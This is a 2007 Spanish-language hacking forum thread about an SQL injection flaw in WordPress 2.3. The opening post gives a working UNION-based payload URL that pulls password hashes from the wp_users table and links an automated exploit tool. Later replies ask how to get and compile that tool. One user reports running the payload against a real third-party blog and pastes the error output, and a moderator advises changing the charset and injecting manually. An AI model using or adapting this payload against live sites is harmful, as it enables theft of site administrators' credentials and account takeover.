 Autor
|
Tema: SQL inyeccion en todas las versiones de wordpress menos la ultima :p (Leído 5,688 veces)
|
|
WHK
|
Una vulnerabilidad de tipo Inyección SQL fue encontrada en wordpress sobre las versiones 2.3 y posteriores. Localmente hice pruebas y la version 2.3.1 no es afectada, de todas formas es recomendable utilizar sistemas de protección adicionales como PHPIDS o filtros que impidan un query con inyecciones SQL. Ejemplo: http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users%23 Esto también puede complementarse con una noticia posterior donde puedes tener acceso como administrador con tan solo tener acceso de lectura a la base de datos: http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/Fuentes: http://www.abelcheung.org/advisory/20071210-wordpress-charset.txthttp://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txthttp://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/http://seclists.org/bugtraq/2007/Dec/0127.htmlhttp://trac.wordpress.org/ticket/2394http://seclists.org/bugtraq/2007/Nov/0274.htmlhttp://h4ck1ng.net/index.php/topic,1036.0.htmlhttp://whk.h4ck1ng.net/2007-12.15/inyeccion-sql-en-wordpress-23-y-posteriores/También está el pwnpress que hace todo el trabajo sucio automaticamente   http://www.info-pull.com/code.dynp |
|
|
|
« Última modificación: 16 Diciembre 2007, 05:46 am por WHK »
|
En línea
|
|
|
|
hackpsycho
 Desconectado
Mensajes: 391
|
donde puedo descargar ese soft amigo?
|
|
|
|
|
En línea
|
|
|
|
-sagitari-
Desconectado
Mensajes: 1.643
:D
|
donde puedo descargar ese soft amigo?
No click&hack link re-"movido"
|
|
|
|
« Última modificación: 23 Diciembre 2007, 14:15 pm por sirdarckcat »
|
En línea
|
|
|
|
gasp
Desconectado
Mensajes: 17
|
alguien sabe como puedo compilarlo ? en cke lo puedo compilar para cke salga en modo graffico como aparece en la imagen ?
consegui el code, pero esta en ruby ya lo compile pero nadamas no ckiere...
|
|
|
|
|
En línea
|
|
|
|
|
WHK
|
Necesitas una librería para poder ejecutarlo la cual no me acuerdo cual era, por eso me aburrí y lo borré |
|
|
|
|
En línea
|
|
|
|
gasp
Desconectado
Mensajes: 17
|
saludos, oie seria bueno cke recordaras esa libreria y asi poder buscarla, y poder compilar al cien ese exploit o programa espero respuesta
|
|
|
|
|
En línea
|
|
|
|
aninhill
Desconectado
Mensajes: 22
|
Lo probe en un blog de wordpress. No se que version es pero me responde esto: WordPress database error: [Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'like']
SELECT SQL_CALC_FOUND_ROWS wp_posts.* FROM wp_posts WHERE 1=1 AND (((post_title LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#') OR (post_content LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#'))) AND post_type = 'post' AND (post_status = 'publish') ORDER BY post_date DESC LIMIT 0, 10
Warning: Cannot modify header information - headers already sent by (output started at /home/jamiecar/public_html/wp-includes/wp-db.php:160) in /home/jamiecar/public_html/wp-includes/pluggable.php on line 391
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Aspirante a supervillano
Moderador
Desconectado
Mensajes: 7.029
No estoy loco, soy mentalmente divergente
|
tienes que hacer la inyeccion manualmente y cambiar el charset a latin.
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
la ultima notificasion se recibio hase menos de 10 seg
Sugerencias y dudas sobre el Foro
|
RedZer
|
4
|
3,846
|
27 Abril 2011, 03:06 am
por Castiblanco
|
|
|
|
mi pc detecta todas las redes wifi menos la mia ¿?
Windows
|
samjack
|
6
|
20,163
|
6 Junio 2013, 22:50 pm
por eladroiu
|
|
|
|
Batch que copie todas las lineas menos la ultima
Scripting
|
santi810
|
1
|
1,827
|
27 Diciembre 2013, 19:37 pm
por Eleкtro
|
|
|
|
Wordpress no publica la ultima entrada
Desarrollo Web
|
peib0l
|
2
|
3,403
|
24 Abril 2015, 11:03 am
por peib0l
|
|
|
|
WordPress ocultó en su última actualización la corrección de una grave ....
Noticias
|
wolfbcn
|
0
|
1,471
|
3 Febrero 2017, 02:03 am
por wolfbcn
|
 |
- 
